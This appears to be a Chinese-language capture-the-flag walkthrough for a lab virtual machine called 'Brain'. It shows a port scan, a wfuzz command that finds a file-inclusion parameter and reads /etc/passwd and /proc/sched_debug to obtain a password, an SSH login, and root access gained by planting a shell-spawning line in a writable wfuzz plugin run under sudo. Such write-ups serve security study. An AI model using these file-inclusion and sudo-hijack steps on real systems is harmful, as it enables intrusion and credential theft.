# 靶场搭建
下载:Brain
Nat,IP: 192.168.1.145
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 2048 32:95:f9:20:44:d7:a1:d1:80:a8:d6:95:91:d5:1e:da (RSA) | |
| 256 07:e7:24:38:1d:64:f6:88:9a:71:23:79:b8:d8:e6:57 (ECDSA) | |
|_ 256 58:a6:da:1e:0f:89:42:2b:ba:de:00:fc:71:78:3d:56 (ED25519) | |
80/tcp open http Apache httpd 2.4.38 ((Debian)) | |
|_http-title: Site doesn't have a title (text/html; charset=UTF-8). | |
|_http-server-header: Apache/2.4.38 (Debian) |
首页莫名其妙,目录收集无果
FUZZ 参数: wfuzz -c -t 200 --hc=404 --hh=361 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt "http://192.168.1.145/index.php?FUZZ=/etc/passwd"
得到 include
参数
http://192.168.1.145/index.php?include=/etc/passwd
,得到了 ben
用户
http://192.168.1.145/index.php?include=/proc/sched_debug
得到了密码: B3nP4zz
/proc/sched_debug 是一个特殊的内核调度器调试接口,用于提供有关 Linux 内核调度器的详细信息。它允许用户和开发人员获取有关进程调度、CPU 负载、调度策略和其他与调度器相关的信息。通过读取 /proc/sched_debug 文件,用户可以深入了解系统中进程如何被调度以及调度器的行为。这对于调优系统性能和调试调度相关的问题非常有用。
ssh 上去,得到 ben 的 shell
# 提权
sudo -l
发现了 wfuzz 程序, -z
参数可以指定一个 py 脚本 payload。那写一个 py 文件,加载进去。
不行 - z 没法那么用,只能写入原有的,但是没有权限
查了一下可写的文件,发现: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/range.py
可以写
在头部写入 bash:
import os | |
os.system("/bin/bash") |
sudo wfuzz -c -z range 1-2
,拿到了 root 权限